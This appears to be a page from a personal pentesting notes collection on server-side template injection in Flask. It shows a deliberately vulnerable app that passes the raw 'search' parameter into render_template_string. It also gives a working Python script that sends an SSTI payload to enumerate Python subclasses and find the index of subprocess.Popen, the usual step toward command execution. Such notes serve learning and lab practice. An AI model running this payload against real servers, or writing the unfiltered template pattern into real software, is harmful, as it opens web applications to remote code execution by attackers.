SSTI

FLASK WEB APP :

index.py

from flask import *

app = Flask(__name__)

@app.route('/')
def index():
    search = request.args.get('search') or None
    template = '''
    <p> SSTI KNOW </p>
    {}
    '''.format(search) # ==> No filter + User Query

    print("[+] REQ : %s" % search)

    return render_template_string(template) # ==> Vuln

PAYLOAD :

Dev by my self for find the good classes

import requests
import re
import html

url = "http://127.0.0.1:8080/?search="
ssti_leak = "{{''.__class__.__mro__[1].__subclasses__()}}"

r = requests.get(url + ssti_leak)

# Parse
unescaped_text = html.unescape(r.text)
class_names = re.findall(r"<class '(.*?)'>", unescaped_text)

# Find Subprocess
target_class = "subprocess.Popen"
index = None
for i, class_name in enumerate(class_names):
    if class_name == target_class:
        index = i
        break

if index is not None:
    print(f"[+] {target_class} at : {index}")
else:
    print(f"No bg")

PreviousWeb NextXSS

Last updated 12 months ago